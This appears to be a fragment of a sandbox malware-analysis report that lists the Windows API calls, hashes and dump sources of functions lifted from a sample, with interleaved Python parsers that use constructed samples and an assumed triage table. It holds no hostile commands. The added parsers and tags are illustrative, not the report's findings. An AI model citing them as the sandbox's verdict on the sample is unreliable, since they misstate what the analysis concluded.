• ReleaseDC.USER32(?,?), ref: 0044A11B
• GetSysColor.USER32(0000000F), ref: 0044A131
• GetWindowLongW.USER32(?,000000F0), ref: 0044A140
• GetSysColor.USER32(0000000F), ref: 0044A14F
• GetSysColor.USER32(00000005), ref: 0044A15B
• GetWindowDC.USER32(?), ref: 0044A1BE
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
• GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
• GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
• GetPixel.GDI32(00000000,?,?), ref: 0044A21D
• ReleaseDC.USER32(?,00000000), ref: 0044A229
• SetBkColor.GDI32(?,00000000), ref: 0044A24C
• GetSysColor.USER32(00000008), ref: 0044A265
• SetTextColor.GDI32(?,00000000), ref: 0044A270
• SetBkMode.GDI32(?,00000001), ref: 0044A282
• GetStockObject.GDI32(00000005), ref: 0044A28A
Similarity
• API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
• String ID:
• API String ID: 1744303182-0
• Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
• Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
• Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
• Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
• __mtterm.LIBCMT ref: 00417C34
  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
• TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
• TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
• __init_pointers.LIBCMT ref: 00417CE6
• __calloc_crt.LIBCMT ref: 00417D54
• GetCurrentThreadId.KERNEL32 ref: 00417D80
Strings
Similarity
• API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
• API String ID: 4163708885-3819984048
• Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
• Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
• Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
• Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
APIs
Strings
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsicoll$IconLoad
                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                            • API String ID: 2485277191-404129466
                                                                                                                                                                                                                                                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                                                                                                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3869813825-0
                                                                                                                                                                                                                                                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                                                                                                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
APIs
• _wcslen.LIBCMT ref: 00464B28
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
• _wcslen.LIBCMT ref: 00464C28
• GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
• _wcslen.LIBCMT ref: 00464CBA
• _wcslen.LIBCMT ref: 00464CD0
• _wcslen.LIBCMT ref: 00464CEF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcslen$Directory$CurrentSystem
• String ID: D
• API String ID: 1914653954-2746444292
• Opcode ID: e98e204db0e404bb482f5e57bef0fda0e3681e2d1bff2b49b0b898238e6c0866
• Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
• Opcode Fuzzy Hash: e98e204db0e404bb482f5e57bef0fda0e3681e2d1bff2b49b0b898238e6c0866
• Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
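The function blocks in this report all follow one line format: an APIs list of `Name.MODULE(args), ref: ADDR` entries (nested `Part of subcall function ADDR:` lines for calls made via a callee), a Memory Dump Source line naming the .sdmp the code was lifted from, and a Similarity block of hashes. When a report runs to thousands of such lines, it is faster to parse them than to read them. The parser below is an added example for working with this listing offline; it is not Joe Sandbox code and the field names it emits are its own. SAMPLE is constructed from API lines shown in the blocks above (the addresses and API names are the report's), and the TAGS table mapping API names to triage tags is the example's assumption, not a classification the report makes.

```python
"""Parse the "APIs" and "Memory Dump Source" listings of a Joe Sandbox
function block into structured records.

Added example for reading this report offline; not Joe Sandbox code.
SAMPLE is constructed from API lines shown in the report; TAGS is an
assumed triage table, not part of the report's own scoring.
"""
import re
from collections import Counter

# Constructed sample: a subset of the report's API reference lines, one
# nested "Part of subcall" line and one "Source File" line.
SAMPLE = """\
APIs
• LoadIconW.USER32(?,00000063), ref: 0045464C
• SetWindowTextW.USER32(?,?), ref: 00454678
• GetDesktopWindow.USER32 ref: 0045476F
• SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
• _wcslen.LIBCMT ref: 00464B28
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

# One API reference: "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR",
# optionally prefixed with "Part of subcall function ADDR: ".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# The dump the function was lifted from and the image base it was rebased to.
SRC_RE = re.compile(
    r"^\s*•\s*Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]{8}),"
    r"\s*based on PE:\s*(?P<pe>true|false)\s*$"
)

# Assumed triage tags for the APIs seen in this report; not the report's own.
TAGS = {
    "SetFileAttributesW": "file-attribute change",
    "SetCurrentDirectoryW": "working-directory change",
    "GetSystemDirectoryW": "system-directory lookup",
    "SetTimer": "timer callback",
    "LoadIconW": "dialog/UI setup",
    "SetWindowTextW": "dialog/UI setup",
}


def parse_listing(text):
    """Return (calls, sources) parsed from one function block's text."""
    calls, sources = [], []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            calls.append({
                "name": m.group("name"),
                "module": m.group("module"),
                # "?" marks an argument the disassembler could not resolve.
                "args": [] if args is None else args.split(","),
                "ref": int(m.group("ref"), 16),
                "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
            })
            continue
        m = SRC_RE.match(line)
        if m:
            sources.append({
                "dump": m.group("dump"),
                "image_base": int(m.group("offset"), 16),
                "based_on_pe": m.group("pe") == "true",
            })
    return calls, sources


def summarize(calls):
    """Per-module counts, triage tags hit, and the address span of direct calls."""
    direct_refs = [c["ref"] for c in calls if c["subcall_of"] is None]
    return {
        "modules": dict(Counter(c["module"] for c in calls)),
        "tags": sorted({TAGS[c["name"]] for c in calls if c["name"] in TAGS}),
        "ref_range": (min(direct_refs), max(direct_refs)) if direct_refs else None,
    }


if __name__ == "__main__":
    calls, sources = parse_listing(SAMPLE)
    for c in calls:
        print(f"{c['ref']:08X} {c['module']:<9} {c['name']}({','.join(c['args'])})")
    print(summarize(calls))
    print(sources)
```

Run it over a whole report saved as text and the per-module counts and tag hits give a first cut of what each lifted function touches; the `subcall_of` field keeps attribute reads made through a callee (such as the GetFileAttributesW at 0043399F above) distinct from the caller's own calls.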
APIs
• _wcsncpy.LIBCMT ref: 0045CE39
• __wsplitpath.LIBCMT ref: 0045CE78
• _wcscat.LIBCMT ref: 0045CE8B
• _wcscat.LIBCMT ref: 0045CE9E
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
• _wcscpy.LIBCMT ref: 0045CF61
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                            • API String ID: 1153243558-438819550
                                                                                                                                                                                                                                                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                                                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
Similarity
• API ID: __wcsicoll
• String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
• API String ID: 3832890014-4202584635
• Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
• Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
APIs
• PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
• GetFocus.USER32 ref: 0046A0DD
• GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
Strings
Similarity
• API ID: MessagePost$CtrlFocus
• String ID: 0
• API String ID: 1534620443-4108050209
• Opcode ID: 2e422b1c08ab171f16f5d4701dd840214b3d6977956fc02ab80c70b0c84f279a
• Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
• Opcode Fuzzy Hash: 2e422b1c08ab171f16f5d4701dd840214b3d6977956fc02ab80c70b0c84f279a
• Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
APIs
• DestroyWindow.USER32(?), ref: 004558E3
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
Strings
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$CreateDestroy
                                                                                                                                                                                                                                                            • String ID: ,$tooltips_class32
                                                                                                                                                                                                                                                            • API String ID: 1109047481-3856767331
                                                                                                                                                                                                                                                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                                                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
APIs
• GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
• GetMenuItemCount.USER32(?), ref: 00468C45
• DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
• DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
• DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
• DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
• GetMenuItemCount.USER32 ref: 00468CFD
• SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
• GetCursorPos.USER32(?), ref: 00468D3F
• SetForegroundWindow.USER32(?), ref: 00468D49
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
• PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 1441871840-4108050209
• Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
• Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
• Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
• Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 3631882475-2268648507
• Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
• Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
• Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
• Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
APIs
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
• ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
• SendMessageW.USER32 ref: 00471740
• ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
• SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
• ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
• SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
• ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
• SendMessageW.USER32 ref: 0047184F
• SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
• SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
• String ID:
• API String ID: 4116747274-0
• Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
• Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
• Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
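The per-function listings above follow one fixed layout: an "APIs" section of `Name.MODULE(args), ref: address` bullets (with indented "Part of subcall function" entries for calls made through a callee), then the "Similarity" key/value pairs. The following parser is an added example, not part of the Joe Sandbox report or its tooling; it turns that text into structured records so an analyst can compare the direct API set of several functions, pull out the constant arguments the tracer recovered (a MessageBoxW flag word, a window message ID), and split the "API ID" grouping on its `$` separator. The sample input is constructed from lines copied off this page; the bullet character and the `ref:` suffix are assumed to be exactly as rendered here.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: lines copied from the function listings on this
# page (the menu-handling and error-reporting functions of LKxcbzlwkz.exe).
SAMPLE = """\
APIs
• GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
• GetMenuItemCount.USER32(?), ref: 00468C45
• DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
• GetMenuItemCount.USER32 ref: 00468CFD
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
Strings
Similarity
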